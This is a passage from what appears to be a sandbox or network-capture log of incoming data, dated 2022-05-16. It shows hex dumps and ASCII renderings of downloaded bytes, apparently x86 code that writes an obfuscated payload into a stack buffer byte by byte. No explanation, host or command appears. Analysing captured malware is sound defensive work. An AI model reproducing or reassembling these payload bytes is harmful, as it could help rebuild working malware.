2022-05-16 08:29:53 UTC	2317	IN	Data Raw: f8 ff b1 c6 85 8d 1c f8 ff 24 c6 85 8e 1c f8 ff b2 c6 85 8f 1c f8 ff c5 c6 85 90 1c f8 ff 46 c6 85 91 1c f8 ff 17 c6 85 92 1c f8 ff 35 c6 85 93 1c f8 ff 0b c6 85 94 1c f8 ff 27 c6 85 95 1c f8 ff ad c6 85 96 1c f8 ff 6a c6 85 97 1c f8 ff 5b c6 85 98 1c f8 ff 53 c6 85 99 1c f8 ff 84 c6 85 9a 1c f8 ff c9 c6 85 9b 1c f8 ff 2f c6 85 9c 1c f8 ff e1 c6 85 9d 1c f8 ff 99 c6 85 9e 1c f8 ff 12 c6 85 9f 1c f8 ff 2c c6 85 a0 1c f8 ff 4e c6 85 a1 1c f8 ff 09 c6 85 a2 1c f8 ff 90 c6 85 a3 1c f8 ff 72 c6 85 a4 1c f8 ff a3 c6 85 a5 1c f8 ff cc c6 85 a6 1c f8 ff ba c6 85 a7 1c f8 ff 6c c6 85 a8 1c f8 ff f4 c6 85 a9 1c f8 ff 8b c6 85 aa 1c f8 ff 75 c6 85 ab 1c f8 ff 02 c6 85 ac 1c f8 ff c8 c6 85 ad 1c f8 ff 54 c6 85 ae 1c f8 ff 53 c6 85 af 1c f8 ff 55 c6 85 b0 1c f8 ff 3a Data Ascii: $F5'j[S/,NrluTSU:
2022-05-16 08:29:53 UTC	2333	IN	Data Raw: 85 b1 25 f8 ff 10 c6 85 b2 25 f8 ff d9 c6 85 b3 25 f8 ff f2 c6 85 b4 25 f8 ff 39 c6 85 b5 25 f8 ff 41 c6 85 b6 25 f8 ff f2 c6 85 b7 25 f8 ff eb c6 85 b8 25 f8 ff fb c6 85 b9 25 f8 ff d8 c6 85 ba 25 f8 ff 76 c6 85 bb 25 f8 ff 3a c6 85 bc 25 f8 ff e8 c6 85 bd 25 f8 ff ab c6 85 be 25 f8 ff 27 c6 85 bf 25 f8 ff 1e c6 85 c0 25 f8 ff ad c6 85 c1 25 f8 ff c6 c6 85 c2 25 f8 ff 2a c6 85 c3 25 f8 ff f1 c6 85 c4 25 f8 ff 18 c6 85 c5 25 f8 ff f8 c6 85 c6 25 f8 ff 00 c6 85 c7 25 f8 ff 78 c6 85 c8 25 f8 ff 27 c6 85 c9 25 f8 ff d7 c6 85 ca 25 f8 ff 84 c6 85 cb 25 f8 ff 0f c6 85 cc 25 f8 ff ef c6 85 cd 25 f8 ff bb c6 85 ce 25 f8 ff 95 c6 85 cf 25 f8 ff 91 c6 85 d0 25 f8 ff 27 c6 85 d1 25 f8 ff 78 c6 85 d2 25 f8 ff d7 c6 85 d3 25 f8 ff d8 c6 85 d4 25 f8 ff 32 c6 85 d5 25 Data Ascii: %%%%9%A%%%%%v%:%%%'%%%%*%%%%%x%'%%%%%%%%'%x%%%2%
2022-05-16 08:29:53 UTC	2349	IN	Data Raw: ff 35 c6 85 d6 2e f8 ff b5 c6 85 d7 2e f8 ff 00 c6 85 d8 2e f8 ff af c6 85 d9 2e f8 ff dd c6 85 da 2e f8 ff 6f c6 85 db 2e f8 ff 56 c6 85 dc 2e f8 ff 79 c6 85 dd 2e f8 ff da c6 85 de 2e f8 ff 2e c6 85 df 2e f8 ff 2a c6 85 e0 2e f8 ff 6c c6 85 e1 2e f8 ff f3 c6 85 e2 2e f8 ff 22 c6 85 e3 2e f8 ff d8 c6 85 e4 2e f8 ff 46 c6 85 e5 2e f8 ff e9 c6 85 e6 2e f8 ff c6 c6 85 e7 2e f8 ff 0e c6 85 e8 2e f8 ff dd c6 85 e9 2e f8 ff 7f c6 85 ea 2e f8 ff 82 c6 85 eb 2e f8 ff 6c c6 85 ec 2e f8 ff fb c6 85 ed 2e f8 ff 10 c6 85 ee 2e f8 ff c8 c6 85 ef 2e f8 ff 44 c6 85 f0 2e f8 ff aa c6 85 f1 2e f8 ff c3 c6 85 f2 2e f8 ff be c6 85 f3 2e f8 ff d7 c6 85 f4 2e f8 ff 9c c6 85 f5 2e f8 ff f3 c6 85 f6 2e f8 ff e3 c6 85 f7 2e f8 ff d3 c6 85 f8 2e f8 ff 5f c6 85 f9 2e f8 ff 43 c6 Data Ascii: 5.....o.V.y....*.l.."..F.......l....D........._.C
2022-05-16 08:29:53 UTC	2365	IN	Data Raw: fa 37 f8 ff 68 c6 85 fb 37 f8 ff 3a c6 85 fc 37 f8 ff b2 c6 85 fd 37 f8 ff 92 c6 85 fe 37 f8 ff 8e c6 85 ff 37 f8 ff a5 c6 85 00 38 f8 ff 22 c6 85 01 38 f8 ff ee c6 85 02 38 f8 ff e4 c6 85 03 38 f8 ff fc c6 85 04 38 f8 ff 66 c6 85 05 38 f8 ff 53 c6 85 06 38 f8 ff d0 c6 85 07 38 f8 ff 4c c6 85 08 38 f8 ff 20 c6 85 09 38 f8 ff b6 c6 85 0a 38 f8 ff da c6 85 0b 38 f8 ff 6a c6 85 0c 38 f8 ff 00 c6 85 0d 38 f8 ff 34 c6 85 0e 38 f8 ff e6 c6 85 0f 38 f8 ff df c6 85 10 38 f8 ff 4e c6 85 11 38 f8 ff 25 c6 85 12 38 f8 ff e7 c6 85 13 38 f8 ff 15 c6 85 14 38 f8 ff 8d c6 85 15 38 f8 ff 02 c6 85 16 38 f8 ff 23 c6 85 17 38 f8 ff bb c6 85 18 38 f8 ff 98 c6 85 19 38 f8 ff 9b c6 85 1a 38 f8 ff 6e c6 85 1b 38 f8 ff 6c c6 85 1c 38 f8 ff 9e c6 85 1d 38 f8 ff ca c6 85 1e 38 f8 Data Ascii: 7h7:77778"8888f8S88L8 888j884888N8%88888#8888n8l888
2022-05-16 08:29:53 UTC	2381	IN	Data Raw: 55 c6 85 1f 41 f8 ff b2 c6 85 20 41 f8 ff c9 c6 85 21 41 f8 ff 01 c6 85 22 41 f8 ff a8 c6 85 23 41 f8 ff 52 c6 85 24 41 f8 ff 69 c6 85 25 41 f8 ff 41 c6 85 26 41 f8 ff 64 c6 85 27 41 f8 ff 7a c6 85 28 41 f8 ff 5a c6 85 29 41 f8 ff 55 c6 85 2a 41 f8 ff 09 c6 85 2b 41 f8 ff e6 c6 85 2c 41 f8 ff ee c6 85 2d 41 f8 ff 07 c6 85 2e 41 f8 ff 31 c6 85 2f 41 f8 ff 00 c6 85 30 41 f8 ff bf c6 85 31 41 f8 ff c3 c6 85 32 41 f8 ff b7 c6 85 33 41 f8 ff 4e c6 85 34 41 f8 ff 00 c6 85 35 41 f8 ff 2d c6 85 36 41 f8 ff 8c c6 85 37 41 f8 ff 5b c6 85 38 41 f8 ff 19 c6 85 39 41 f8 ff 22 c6 85 3a 41 f8 ff cc c6 85 3b 41 f8 ff 16 c6 85 3c 41 f8 ff a5 c6 85 3d 41 f8 ff 0d c6 85 3e 41 f8 ff 3d c6 85 3f 41 f8 ff 34 c6 85 40 41 f8 ff 48 c6 85 41 41 f8 ff 26 c6 85 42 41 f8 ff 67 c6 85 Data Ascii: UA A!A"A#AR$Ai%AA&Ad'Az(AZ)AU*A+A,A-A.A1/A0A1A2A3AN4A5A-6A7A[8A9A":A;A<A=A>A=?A4@AHAA&BAg
2022-05-16 08:29:53 UTC	2397	IN	Data Raw: 4a f8 ff 09 c6 85 44 4a f8 ff 7a c6 85 45 4a f8 ff 87 c6 85 46 4a f8 ff 51 c6 85 47 4a f8 ff 27 c6 85 48 4a f8 ff b2 c6 85 49 4a f8 ff 03 c6 85 4a 4a f8 ff 9e c6 85 4b 4a f8 ff 43 c6 85 4c 4a f8 ff 12 c6 85 4d 4a f8 ff f8 c6 85 4e 4a f8 ff 6f c6 85 4f 4a f8 ff be c6 85 50 4a f8 ff 43 c6 85 51 4a f8 ff 11 c6 85 52 4a f8 ff 3e c6 85 53 4a f8 ff f9 c6 85 54 4a f8 ff bc c6 85 55 4a f8 ff fa c6 85 56 4a f8 ff 34 c6 85 57 4a f8 ff 53 c6 85 58 4a f8 ff 1a c6 85 59 4a f8 ff 8b c6 85 5a 4a f8 ff 36 c6 85 5b 4a f8 ff 2f c6 85 5c 4a f8 ff fc c6 85 5d 4a f8 ff 1a c6 85 5e 4a f8 ff 63 c6 85 5f 4a f8 ff ba c6 85 60 4a f8 ff 42 c6 85 61 4a f8 ff c3 c6 85 62 4a f8 ff 14 c6 85 63 4a f8 ff 2f c6 85 64 4a f8 ff 85 c6 85 65 4a f8 ff 7b c6 85 66 4a f8 ff 70 c6 85 67 4a f8 ff Data Ascii: JDJzEJFJQGJ'HJIJJJKJCLJMJNJoOJPJCQJRJ>SJTJUJVJ4WJSXJYJZJ6[J/\J]J^Jc_J`JBaJbJcJ/dJeJ{fJpgJ
2022-05-16 08:29:53 UTC	2413	IN	Data Raw: c6 85 68 53 f8 ff f6 c6 85 69 53 f8 ff 07 c6 85 6a 53 f8 ff f3 c6 85 6b 53 f8 ff 82 c6 85 6c 53 f8 ff 4c c6 85 6d 53 f8 ff 67 c6 85 6e 53 f8 ff 7e c6 85 6f 53 f8 ff 8c c6 85 70 53 f8 ff 6e c6 85 71 53 f8 ff 7e c6 85 72 53 f8 ff 5e c6 85 73 53 f8 ff db c6 85 74 53 f8 ff 04 c6 85 75 53 f8 ff 9f c6 85 76 53 f8 ff af c6 85 77 53 f8 ff df c6 85 78 53 f8 ff 09 c6 85 79 53 f8 ff 75 c6 85 7a 53 f8 ff 99 c6 85 7b 53 f8 ff 08 c6 85 7c 53 f8 ff 54 c6 85 7d 53 f8 ff 61 c6 85 7e 53 f8 ff b6 c6 85 7f 53 f8 ff 6a c6 85 80 53 f8 ff 8f c6 85 81 53 f8 ff e8 c6 85 82 53 f8 ff 35 c6 85 83 53 f8 ff 75 c6 85 84 53 f8 ff b2 c6 85 85 53 f8 ff f3 c6 85 86 53 f8 ff 73 c6 85 87 53 f8 ff ab c6 85 88 53 f8 ff 38 c6 85 89 53 f8 ff f8 c6 85 8a 53 f8 ff e0 c6 85 8b 53 f8 ff fc c6 85 8c Data Ascii: hSiSjSkSlSLmSgnS~oSpSnqS~rS^sStSuSvSwSxSySuzS{S\|ST}Sa~SSjSSS5SuSSSsSS8SSS
2022-05-16 08:29:53 UTC	2429	IN	Data Raw: f8 ff 68 c6 85 8d 5c f8 ff bd c6 85 8e 5c f8 ff b7 c6 85 8f 5c f8 ff 2d c6 85 90 5c f8 ff 27 c6 85 91 5c f8 ff 9b c6 85 92 5c f8 ff 89 c6 85 93 5c f8 ff eb c6 85 94 5c f8 ff 90 c6 85 95 5c f8 ff ee c6 85 96 5c f8 ff 38 c6 85 97 5c f8 ff d8 c6 85 98 5c f8 ff 28 c6 85 99 5c f8 ff 09 c6 85 9a 5c f8 ff 24 c6 85 9b 5c f8 ff d9 c6 85 9c 5c f8 ff 1e c6 85 9d 5c f8 ff f1 c6 85 9e 5c f8 ff d3 c6 85 9f 5c f8 ff ac c6 85 a0 5c f8 ff 7e c6 85 a1 5c f8 ff 50 c6 85 a2 5c f8 ff 40 c6 85 a3 5c f8 ff 9c c6 85 a4 5c f8 ff a5 c6 85 a5 5c f8 ff 6d c6 85 a6 5c f8 ff 03 c6 85 a7 5c f8 ff 7a c6 85 a8 5c f8 ff 3d c6 85 a9 5c f8 ff bc c6 85 aa 5c f8 ff 2c c6 85 ab 5c f8 ff 98 c6 85 ac 5c f8 ff 72 c6 85 ad 5c f8 ff ca c6 85 ae 5c f8 ff 9c c6 85 af 5c f8 ff f9 c6 85 b0 5c f8 ff 6c Data Ascii: h\\\-\'\\\\\\8\\(\\$\\\\\\~\P\@\\\m\\z\=\\,\\r\\\\l
2022-05-16 08:29:53 UTC	2445	IN	Data Raw: 85 b1 65 f8 ff de c6 85 b2 65 f8 ff 8d c6 85 b3 65 f8 ff 5c c6 85 b4 65 f8 ff 26 c6 85 b5 65 f8 ff d8 c6 85 b6 65 f8 ff 60 c6 85 b7 65 f8 ff 59 c6 85 b8 65 f8 ff 62 c6 85 b9 65 f8 ff 0d c6 85 ba 65 f8 ff 16 c6 85 bb 65 f8 ff 84 c6 85 bc 65 f8 ff c9 c6 85 bd 65 f8 ff e4 c6 85 be 65 f8 ff a0 c6 85 bf 65 f8 ff 63 c6 85 c0 65 f8 ff cc c6 85 c1 65 f8 ff 54 c6 85 c2 65 f8 ff 8e c6 85 c3 65 f8 ff 08 c6 85 c4 65 f8 ff e0 c6 85 c5 65 f8 ff 85 c6 85 c6 65 f8 ff dd c6 85 c7 65 f8 ff bc c6 85 c8 65 f8 ff 8b c6 85 c9 65 f8 ff 53 c6 85 ca 65 f8 ff 7e c6 85 cb 65 f8 ff 86 c6 85 cc 65 f8 ff 5d c6 85 cd 65 f8 ff b9 c6 85 ce 65 f8 ff cc c6 85 cf 65 f8 ff 63 c6 85 d0 65 f8 ff 6c c6 85 d1 65 f8 ff d9 c6 85 d2 65 f8 ff 27 c6 85 d3 65 f8 ff f7 c6 85 d4 65 f8 ff 9a c6 85 d5 65 Data Ascii: eee\e&ee`eYebeeeeeeeceeTeeeeeeeeSe~ee]eeecelee'eee
2022-05-16 08:29:53 UTC	2461	IN	Data Raw: ff f6 c6 85 d6 6e f8 ff 0a c6 85 d7 6e f8 ff 93 c6 85 d8 6e f8 ff 9e c6 85 d9 6e f8 ff 28 c6 85 da 6e f8 ff a3 c6 85 db 6e f8 ff df c6 85 dc 6e f8 ff 9e c6 85 dd 6e f8 ff d7 c6 85 de 6e f8 ff 66 c6 85 df 6e f8 ff 64 c6 85 e0 6e f8 ff cc c6 85 e1 6e f8 ff 2e c6 85 e2 6e f8 ff 09 c6 85 e3 6e f8 ff fd c6 85 e4 6e f8 ff e4 c6 85 e5 6e f8 ff 51 c6 85 e6 6e f8 ff 09 c6 85 e7 6e f8 ff c7 c6 85 e8 6e f8 ff d7 c6 85 e9 6e f8 ff 44 c6 85 ea 6e f8 ff 5c c6 85 eb 6e f8 ff 9d c6 85 ec 6e f8 ff 80 c6 85 ed 6e f8 ff 94 c6 85 ee 6e f8 ff 6c c6 85 ef 6e f8 ff 72 c6 85 f0 6e f8 ff e0 c6 85 f1 6e f8 ff 10 c6 85 f2 6e f8 ff 04 c6 85 f3 6e f8 ff a4 c6 85 f4 6e f8 ff c7 c6 85 f5 6e f8 ff 17 c6 85 f6 6e f8 ff 48 c6 85 f7 6e f8 ff ac c6 85 f8 6e f8 ff e3 c6 85 f9 6e f8 ff 23 c6 Data Ascii: nnnn(nnnnnfndnn.nnnnQnnnnDn\nnnnlnrnnnnnnnHnnn#
2022-05-16 08:29:53 UTC	2477	IN	Data Raw: fa 77 f8 ff 9a c6 85 fb 77 f8 ff ab c6 85 fc 77 f8 ff a4 c6 85 fd 77 f8 ff 25 c6 85 fe 77 f8 ff 37 c6 85 ff 77 f8 ff 8b c6 85 00 78 f8 ff 3f c6 85 01 78 f8 ff 34 c6 85 02 78 f8 ff a9 c6 85 03 78 f8 ff 36 c6 85 04 78 f8 ff cc c6 85 05 78 f8 ff b0 c6 85 06 78 f8 ff f6 c6 85 07 78 f8 ff 58 c6 85 08 78 f8 ff bf c6 85 09 78 f8 ff ca c6 85 0a 78 f8 ff 49 c6 85 0b 78 f8 ff 79 c6 85 0c 78 f8 ff 97 c6 85 0d 78 f8 ff 0b c6 85 0e 78 f8 ff 16 c6 85 0f 78 f8 ff 7a c6 85 10 78 f8 ff 46 c6 85 11 78 f8 ff 42 c6 85 12 78 f8 ff 50 c6 85 13 78 f8 ff 97 c6 85 14 78 f8 ff 4e c6 85 15 78 f8 ff eb c6 85 16 78 f8 ff a5 c6 85 17 78 f8 ff 53 c6 85 18 78 f8 ff 36 c6 85 19 78 f8 ff 8a c6 85 1a 78 f8 ff 63 c6 85 1b 78 f8 ff 0c c6 85 1c 78 f8 ff 9d c6 85 1d 78 f8 ff 26 c6 85 1e 78 f8 Data Ascii: wwww%w7wx?x4xx6xxxxXxxxIxyxxxxzxFxBxPxxNxxxSx6xxcxxx&x
2022-05-16 08:29:53 UTC	2493	IN	Data Raw: 96 c6 85 1f 81 f8 ff 49 c6 85 20 81 f8 ff 41 c6 85 21 81 f8 ff 12 c6 85 22 81 f8 ff e6 c6 85 23 81 f8 ff 27 c6 85 24 81 f8 ff 88 c6 85 25 81 f8 ff cb c6 85 26 81 f8 ff a6 c6 85 27 81 f8 ff 8c c6 85 28 81 f8 ff 15 c6 85 29 81 f8 ff 8c c6 85 2a 81 f8 ff 85 c6 85 2b 81 f8 ff b4 c6 85 2c 81 f8 ff 33 c6 85 2d 81 f8 ff 23 c6 85 2e 81 f8 ff c1 c6 85 2f 81 f8 ff 93 c6 85 30 81 f8 ff 6e c6 85 31 81 f8 ff dd c6 85 32 81 f8 ff b5 c6 85 33 81 f8 ff f5 c6 85 34 81 f8 ff 56 c6 85 35 81 f8 ff 66 c6 85 36 81 f8 ff 71 c6 85 37 81 f8 ff 8e c6 85 38 81 f8 ff ae c6 85 39 81 f8 ff 86 c6 85 3a 81 f8 ff 9a c6 85 3b 81 f8 ff 41 c6 85 3c 81 f8 ff 2f c6 85 3d 81 f8 ff df c6 85 3e 81 f8 ff 56 c6 85 3f 81 f8 ff c1 c6 85 40 81 f8 ff 74 c6 85 41 81 f8 ff d6 c6 85 42 81 f8 ff 8b c6 85 Data Ascii: I A!"#'$%&'()*+,3-#./0n1234V5f6q789:;A</=>V?@tAB
2022-05-16 08:29:53 UTC	2509	IN	Data Raw: 8a f8 ff 11 c6 85 44 8a f8 ff e1 c6 85 45 8a f8 ff df c6 85 46 8a f8 ff c3 c6 85 47 8a f8 ff 3a c6 85 48 8a f8 ff 6e c6 85 49 8a f8 ff c5 c6 85 4a 8a f8 ff 70 c6 85 4b 8a f8 ff 0f c6 85 4c 8a f8 ff 92 c6 85 4d 8a f8 ff db c6 85 4e 8a f8 ff a2 c6 85 4f 8a f8 ff 34 c6 85 50 8a f8 ff 74 c6 85 51 8a f8 ff b8 c6 85 52 8a f8 ff b8 c6 85 53 8a f8 ff 63 c6 85 54 8a f8 ff 1a c6 85 55 8a f8 ff 32 c6 85 56 8a f8 ff 24 c6 85 57 8a f8 ff 0d c6 85 58 8a f8 ff fb c6 85 59 8a f8 ff 10 c6 85 5a 8a f8 ff 97 c6 85 5b 8a f8 ff 49 c6 85 5c 8a f8 ff 5a c6 85 5d 8a f8 ff d9 c6 85 5e 8a f8 ff 01 c6 85 5f 8a f8 ff 31 c6 85 60 8a f8 ff 7a c6 85 61 8a f8 ff 47 c6 85 62 8a f8 ff cc c6 85 63 8a f8 ff b6 c6 85 64 8a f8 ff 19 c6 85 65 8a f8 ff 71 c6 85 66 8a f8 ff fd c6 85 67 8a f8 ff Data Ascii: DEFG:HnIJpKLMNO4PtQRScTU2V$WXYZ[I\Z]^_1`zaGbcdeqfg
2022-05-16 08:29:53 UTC	2525	IN	Data Raw: c6 85 68 93 f8 ff 20 c6 85 69 93 f8 ff 67 c6 85 6a 93 f8 ff 71 c6 85 6b 93 f8 ff e2 c6 85 6c 93 f8 ff bf c6 85 6d 93 f8 ff 62 c6 85 6e 93 f8 ff e8 c6 85 6f 93 f8 ff 7b c6 85 70 93 f8 ff ab c6 85 71 93 f8 ff d6 c6 85 72 93 f8 ff 94 c6 85 73 93 f8 ff d3 c6 85 74 93 f8 ff 36 c6 85 75 93 f8 ff 21 c6 85 76 93 f8 ff 35 c6 85 77 93 f8 ff ba c6 85 78 93 f8 ff 14 c6 85 79 93 f8 ff bf c6 85 7a 93 f8 ff 12 c6 85 7b 93 f8 ff 53 c6 85 7c 93 f8 ff a7 c6 85 7d 93 f8 ff e4 c6 85 7e 93 f8 ff 93 c6 85 7f 93 f8 ff c3 c6 85 80 93 f8 ff cb c6 85 81 93 f8 ff 46 c6 85 82 93 f8 ff a7 c6 85 83 93 f8 ff c3 c6 85 84 93 f8 ff 1a c6 85 85 93 f8 ff 24 c6 85 86 93 f8 ff 75 c6 85 87 93 f8 ff f7 c6 85 88 93 f8 ff 7d c6 85 89 93 f8 ff dc c6 85 8a 93 f8 ff 3a c6 85 8b 93 f8 ff 63 c6 85 8c Data Ascii: h igjqklmbno{pqrst6u!v5wxyz{S\|}~F$u}:c
2022-05-16 08:29:53 UTC	2541	IN	Data Raw: f8 ff c3 c6 85 8d 9c f8 ff d6 c6 85 8e 9c f8 ff 68 c6 85 8f 9c f8 ff 27 c6 85 90 9c f8 ff 3a c6 85 91 9c f8 ff e9 c6 85 92 9c f8 ff 36 c6 85 93 9c f8 ff 80 c6 85 94 9c f8 ff 5e c6 85 95 9c f8 ff 31 c6 85 96 9c f8 ff f0 c6 85 97 9c f8 ff 82 c6 85 98 9c f8 ff 77 c6 85 99 9c f8 ff 97 c6 85 9a 9c f8 ff c4 c6 85 9b 9c f8 ff 3e c6 85 9c 9c f8 ff b1 c6 85 9d 9c f8 ff 73 c6 85 9e 9c f8 ff 6d c6 85 9f 9c f8 ff 93 c6 85 a0 9c f8 ff 4d c6 85 a1 9c f8 ff fc c6 85 a2 9c f8 ff fc c6 85 a3 9c f8 ff c0 c6 85 a4 9c f8 ff 1f c6 85 a5 9c f8 ff e9 c6 85 a6 9c f8 ff d7 c6 85 a7 9c f8 ff 40 c6 85 a8 9c f8 ff 64 c6 85 a9 9c f8 ff e3 c6 85 aa 9c f8 ff e4 c6 85 ab 9c f8 ff 55 c6 85 ac 9c f8 ff 1c c6 85 ad 9c f8 ff d8 c6 85 ae 9c f8 ff 90 c6 85 af 9c f8 ff ca c6 85 b0 9c f8 ff a7 Data Ascii: h':6^1w>smM@dU
2022-05-16 08:29:53 UTC	2557	IN	Data Raw: 85 b1 a5 f8 ff 11 c6 85 b2 a5 f8 ff 4b c6 85 b3 a5 f8 ff 28 c6 85 b4 a5 f8 ff a4 c6 85 b5 a5 f8 ff a8 c6 85 b6 a5 f8 ff 54 c6 85 b7 a5 f8 ff 86 c6 85 b8 a5 f8 ff ec c6 85 b9 a5 f8 ff c2 c6 85 ba a5 f8 ff eb c6 85 bb a5 f8 ff 67 c6 85 bc a5 f8 ff 77 c6 85 bd a5 f8 ff a8 c6 85 be a5 f8 ff f2 c6 85 bf a5 f8 ff c1 c6 85 c0 a5 f8 ff 9b c6 85 c1 a5 f8 ff e1 c6 85 c2 a5 f8 ff e2 c6 85 c3 a5 f8 ff 00 c6 85 c4 a5 f8 ff 7d c6 85 c5 a5 f8 ff 6a c6 85 c6 a5 f8 ff db c6 85 c7 a5 f8 ff 84 c6 85 c8 a5 f8 ff 03 c6 85 c9 a5 f8 ff bc c6 85 ca a5 f8 ff 77 c6 85 cb a5 f8 ff c9 c6 85 cc a5 f8 ff 85 c6 85 cd a5 f8 ff 5e c6 85 ce a5 f8 ff 37 c6 85 cf a5 f8 ff 32 c6 85 d0 a5 f8 ff 24 c6 85 d1 a5 f8 ff 8d c6 85 d2 a5 f8 ff 7c c6 85 d3 a5 f8 ff 40 c6 85 d4 a5 f8 ff 33 c6 85 d5 a5 Data Ascii: K(Tgw}jw^72$\|@3
2022-05-16 08:29:53 UTC	2573	IN	Data Raw: ff 06 c6 85 d6 ae f8 ff 4f c6 85 d7 ae f8 ff 0e c6 85 d8 ae f8 ff 56 c6 85 d9 ae f8 ff c6 c6 85 da ae f8 ff 27 c6 85 db ae f8 ff f5 c6 85 dc ae f8 ff f2 c6 85 dd ae f8 ff cc c6 85 de ae f8 ff 42 c6 85 df ae f8 ff ae c6 85 e0 ae f8 ff 80 c6 85 e1 ae f8 ff 43 c6 85 e2 ae f8 ff 29 c6 85 e3 ae f8 ff 5b c6 85 e4 ae f8 ff 4f c6 85 e5 ae f8 ff 32 c6 85 e6 ae f8 ff a5 c6 85 e7 ae f8 ff f0 c6 85 e8 ae f8 ff ac c6 85 e9 ae f8 ff c8 c6 85 ea ae f8 ff e8 c6 85 eb ae f8 ff 19 c6 85 ec ae f8 ff 7e c6 85 ed ae f8 ff 7b c6 85 ee ae f8 ff 79 c6 85 ef ae f8 ff 00 c6 85 f0 ae f8 ff b8 c6 85 f1 ae f8 ff 1b c6 85 f2 ae f8 ff 61 c6 85 f3 ae f8 ff d1 c6 85 f4 ae f8 ff cc c6 85 f5 ae f8 ff 43 c6 85 f6 ae f8 ff be c6 85 f7 ae f8 ff 82 c6 85 f8 ae f8 ff a2 c6 85 f9 ae f8 ff 89 c6 Data Ascii: OV'BC)[O2~{yaC
2022-05-16 08:29:53 UTC	2589	IN	Data Raw: fa b7 f8 ff 76 c6 85 fb b7 f8 ff 2b c6 85 fc b7 f8 ff c6 c6 85 fd b7 f8 ff 54 c6 85 fe b7 f8 ff 48 c6 85 ff b7 f8 ff d7 c6 85 00 b8 f8 ff 60 c6 85 01 b8 f8 ff e6 c6 85 02 b8 f8 ff a4 c6 85 03 b8 f8 ff 1d c6 85 04 b8 f8 ff a1 c6 85 05 b8 f8 ff 86 c6 85 06 b8 f8 ff d4 c6 85 07 b8 f8 ff 46 c6 85 08 b8 f8 ff 18 c6 85 09 b8 f8 ff c4 c6 85 0a b8 f8 ff d7 c6 85 0b b8 f8 ff b4 c6 85 0c b8 f8 ff eb c6 85 0d b8 f8 ff d7 c6 85 0e b8 f8 ff 69 c6 85 0f b8 f8 ff 27 c6 85 10 b8 f8 ff 6b c6 85 11 b8 f8 ff 3b c6 85 12 b8 f8 ff 6b c6 85 13 b8 f8 ff 6d c6 85 14 b8 f8 ff 24 c6 85 15 b8 f8 ff 40 c6 85 16 b8 f8 ff 9f c6 85 17 b8 f8 ff 53 c6 85 18 b8 f8 ff f6 c6 85 19 b8 f8 ff e4 c6 85 1a b8 f8 ff 68 c6 85 1b b8 f8 ff bd c6 85 1c b8 f8 ff 66 c6 85 1d b8 f8 ff e3 c6 85 1e b8 f8 Data Ascii: v+TH`Fi'k;km$@Shf
2022-05-16 08:29:53 UTC	2605	IN	Data Raw: 64 c6 85 1f c1 f8 ff ef c6 85 20 c1 f8 ff 0c c6 85 21 c1 f8 ff 39 c6 85 22 c1 f8 ff 75 c6 85 23 c1 f8 ff 51 c6 85 24 c1 f8 ff 2d c6 85 25 c1 f8 ff 70 c6 85 26 c1 f8 ff ce c6 85 27 c1 f8 ff f8 c6 85 28 c1 f8 ff 0b c6 85 29 c1 f8 ff d3 c6 85 2a c1 f8 ff f2 c6 85 2b c1 f8 ff 84 c6 85 2c c1 f8 ff a6 c6 85 2d c1 f8 ff b9 c6 85 2e c1 f8 ff 49 c6 85 2f c1 f8 ff cd c6 85 30 c1 f8 ff d3 c6 85 31 c1 f8 ff 04 c6 85 32 c1 f8 ff 43 c6 85 33 c1 f8 ff 90 c6 85 34 c1 f8 ff ac c6 85 35 c1 f8 ff d1 c6 85 36 c1 f8 ff a1 c6 85 37 c1 f8 ff 14 c6 85 38 c1 f8 ff ec c6 85 39 c1 f8 ff c8 c6 85 3a c1 f8 ff d1 c6 85 3b c1 f8 ff a0 c6 85 3c c1 f8 ff 14 c6 85 3d c1 f8 ff 43 c6 85 3e c1 f8 ff 63 c6 85 3f c1 f8 ff bd c6 85 40 c1 f8 ff 66 c6 85 41 c1 f8 ff 0b c6 85 42 c1 f8 ff c5 c6 85 Data Ascii: d !9"u#Q$-%p&'()*+,-.I/012C3456789:;<=C>c?@fAB
2022-05-16 08:29:53 UTC	2621	IN	Data Raw: ca f8 ff 4f c6 85 44 ca f8 ff 11 c6 85 45 ca f8 ff 63 c6 85 46 ca f8 ff ac c6 85 47 ca f8 ff 0b c6 85 48 ca f8 ff d3 c6 85 49 ca f8 ff da c6 85 4a ca f8 ff 31 c6 85 4b ca f8 ff ac c6 85 4c ca f8 ff 86 c6 85 4d ca f8 ff 17 c6 85 4e ca f8 ff 65 c6 85 4f ca f8 ff 45 c6 85 50 ca f8 ff ce c6 85 51 ca f8 ff c0 c6 85 52 ca f8 ff 67 c6 85 53 ca f8 ff 98 c6 85 54 ca f8 ff c5 c6 85 55 ca f8 ff b9 c6 85 56 ca f8 ff 7d c6 85 57 ca f8 ff a1 c6 85 58 ca f8 ff 75 c6 85 59 ca f8 ff 38 c6 85 5a ca f8 ff 26 c6 85 5b ca f8 ff 3f c6 85 5c ca f8 ff e0 c6 85 5d ca f8 ff 41 c6 85 5e ca f8 ff 2f c6 85 5f ca f8 ff e7 c6 85 60 ca f8 ff 6a c6 85 61 ca f8 ff 46 c6 85 62 ca f8 ff 07 c6 85 63 ca f8 ff 5e c6 85 64 ca f8 ff ae c6 85 65 ca f8 ff 01 c6 85 66 ca f8 ff af c6 85 67 ca f8 ff Data Ascii: ODEcFGHIJ1KLMNeOEPQRgSTUV}WXuY8Z&[?\]A^/_`jaFbc^defg
2022-05-16 08:29:53 UTC	2637	IN	Data Raw: c6 85 68 d3 f8 ff 85 c6 85 69 d3 f8 ff e9 c6 85 6a d3 f8 ff ed c6 85 6b d3 f8 ff 3e c6 85 6c d3 f8 ff 7e c6 85 6d d3 f8 ff 95 c6 85 6e d3 f8 ff bb c6 85 6f d3 f8 ff 6d c6 85 70 d3 f8 ff a3 c6 85 71 d3 f8 ff df c6 85 72 d3 f8 ff fe c6 85 73 d3 f8 ff 68 c6 85 74 d3 f8 ff 8c c6 85 75 d3 f8 ff cb c6 85 76 d3 f8 ff c8 c6 85 77 d3 f8 ff f5 c6 85 78 d3 f8 ff 34 c6 85 79 d3 f8 ff 79 c6 85 7a d3 f8 ff dd c6 85 7b d3 f8 ff 98 c6 85 7c d3 f8 ff d0 c6 85 7d d3 f8 ff 70 c6 85 7e d3 f8 ff 78 c6 85 7f d3 f8 ff f5 c6 85 80 d3 f8 ff 29 c6 85 81 d3 f8 ff ff c6 85 82 d3 f8 ff 8b c6 85 83 d3 f8 ff 04 c6 85 84 d3 f8 ff 0d c6 85 85 d3 f8 ff fe c6 85 86 d3 f8 ff 94 c6 85 87 d3 f8 ff 95 c6 85 88 d3 f8 ff 9d c6 85 89 d3 f8 ff ce c6 85 8a d3 f8 ff 3d c6 85 